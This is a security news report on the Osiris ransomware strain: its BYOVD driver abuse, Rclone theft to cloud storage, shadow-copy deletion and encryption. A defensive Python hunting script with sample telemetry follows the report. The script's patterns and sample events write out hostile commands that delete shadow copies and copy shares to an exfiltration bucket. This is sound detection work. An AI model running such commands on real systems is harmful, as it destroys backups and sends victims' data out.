Osiris ransomware emerges, leveraging BYOVD technique to kill security tools

securityaffairs.com · 11w

Researchers identified a new Osiris ransomware used in a November 2025 attack, abusing the POORTRY driver via BYOVD to disable security tools.

Symantec and Carbon Black researchers uncovered a new ransomware strain named Osiris, used in a November 2025 attack against a major Southeast Asian food service franchise operator.

The attackers deployed a malicious driver, POORTRY, abusing the Bring Your Own Vulnerable Driver (BYOVD) technique to disable security software, according to Symantec and VMware Carbon Black threat hunters.

Little is known about Osiris’ developers or whether it’s offered as RaaS, but evidence suggests links to INC ransomware actors.

“While this Osiris ransomware shares a name with a ransomware family from 2016, which was a variant of the Locky ransomware, there is no indication that there is any link between these two families,” reads the report published by Symantec and Carbon Black.

Osiris appears to be a new ransomware strain unrelated to the 2016 Locky-based variant of the same name. The developers and any RaaS model remain unknown, but Broadcom researchers found signs linking the attackers to the INC (Warble) ransomware group.

Osiris is a full-featured ransomware with capabilities to stop services and processes, select files and folders to encrypt, and drop a ransom note. The researchers report that it supports multiple command-line options to define targets, logging, encryption mode (partial or full), and Hyper-V handling. The new ransomware family skips specific file types and system folders, appends a .Osiris extension to encrypted files, deletes VSS snapshots, and terminates database, backup, and productivity processes. The malware uses hybrid ECC and AES-128-CTR encryption with a unique key per file, manages async I/O via completion ports, and leaves an Osiris-MESSAGE.txt ransom note with extortion details and negotiation links.

The attack chain began days before ransomware deployment, when attackers quietly stole data using Rclone and uploaded it to a Wasabi cloud storage bucket. This method, along with reused tools like a Mimikatz variant named kaz.exe, mirrors past INC ransomware operations, suggesting either imitation or involvement by a former INC affiliate.
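The behaviours the report describes (a kernel driver loaded via BYOVD, shadow copy deletion, Rclone staging to cloud storage, the kaz.exe credential tool, mass renames to the .Osiris extension and the Osiris-MESSAGE.txt note) are all visible in ordinary endpoint telemetry. The following is an added illustration of how a defender might hunt for that sequence; it is not code from the article or from Symantec/Carbon Black. The event schema (`host`, `type`, `image`, `cmdline`, `signature`, `new_name`, `path`) is an assumption, the telemetry is constructed, and the driver file name `poortry_placeholder.sys` is a hypothetical stand-in because the article names POORTRY but gives no file name or hash.

```python
import re
from collections import defaultdict

# Shadow copy deletion on the command line is the classic pre-encryption tell.
VSS_DELETE = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)
DRIVER_DIR = r"c:\windows\system32\drivers"
BAD_SIGNATURES = {"unsigned", "revoked", "untrusted"}


def basename(path):
    """Last component of a Windows-style path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events, rename_threshold=5):
    """Return {host: sorted list of finding names} for the Osiris-style
    indicators seen in a stream of telemetry events (dicts)."""
    findings = defaultdict(set)
    osiris_renames = defaultdict(int)
    for ev in events:
        host, kind = ev["host"], ev["type"]
        image = basename(ev.get("image", ""))
        cmd = ev.get("cmdline", "")
        if kind == "process":
            if VSS_DELETE.search(cmd):
                findings[host].add("vss_snapshot_deletion")
            # Rclone is a legitimate tool; on a file server it is still worth a look.
            if image == "rclone.exe" or re.search(r"\brclone(\.exe)?\b", cmd, re.I):
                findings[host].add("rclone_exfil")
            # File-name match only: the article names kaz.exe as a Mimikatz variant,
            # so this rule is brittle and should be backed by a hash or behaviour rule.
            if image == "kaz.exe":
                findings[host].add("mimikatz_variant_kaz")
        elif kind == "driver_load":
            # BYOVD drivers are often validly signed, so also flag loads from
            # outside the drivers directory, not just bad signature states.
            in_driver_dir = ev.get("image", "").lower().startswith(DRIVER_DIR)
            if ev.get("signature", "").lower() in BAD_SIGNATURES or not in_driver_dir:
                findings[host].add("suspicious_driver_load")
        elif kind == "file_rename":
            if ev.get("new_name", "").lower().endswith(".osiris"):
                osiris_renames[host] += 1
        elif kind == "file_create":
            if basename(ev.get("path", "")) == "osiris-message.txt":
                findings[host].add("osiris_ransom_note")
    # A handful of .Osiris renames per host is the mass-encryption signal.
    for host, count in osiris_renames.items():
        if count >= rename_threshold:
            findings[host].add("mass_osiris_rename")
    return {h: sorted(f) for h, f in findings.items()}


# Constructed sample telemetry (not real logs): one benign workstation, a domain
# controller running the kaz.exe tool, and a file server showing the full chain.
SAMPLE_EVENTS = [
    {"host": "ws07", "type": "process", "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"host": "ws07", "type": "driver_load",
     "image": r"C:\Windows\System32\drivers\tcpip.sys", "signature": "valid"},
    {"host": "ws07", "type": "file_rename", "new_name": r"D:\Docs\report.docx"},
    {"host": "fs01", "type": "process", "image": r"C:\Windows\Temp\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Shares wasabi:exfil-bucket"},
    {"host": "dc01", "type": "process", "image": r"C:\Users\Public\kaz.exe",
     "cmdline": "kaz.exe"},
    {"host": "fs01", "type": "driver_load",  # hypothetical file name, see lead-in
     "image": r"C:\Windows\Temp\poortry_placeholder.sys", "signature": "revoked"},
    {"host": "fs01", "type": "process", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "fs01", "type": "file_create", "path": r"D:\Shares\Osiris-MESSAGE.txt"},
] + [
    {"host": "fs01", "type": "file_rename", "new_name": rf"D:\Shares\file{i}.xlsx.Osiris"}
    for i in range(5)
]

if __name__ == "__main__":
    for host, hits in hunt(SAMPLE_EVENTS).items():
        print(host, hits)
```

Run stand-alone it prints the findings per host; `fs01` lights up every rule while the benign workstation produces nothing. The rename threshold is deliberately a parameter: in a real deployment it should be tuned per host role, and the driver rule should be paired with a blocklist of known-abused drivers rather than relying on path and signature state alone.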
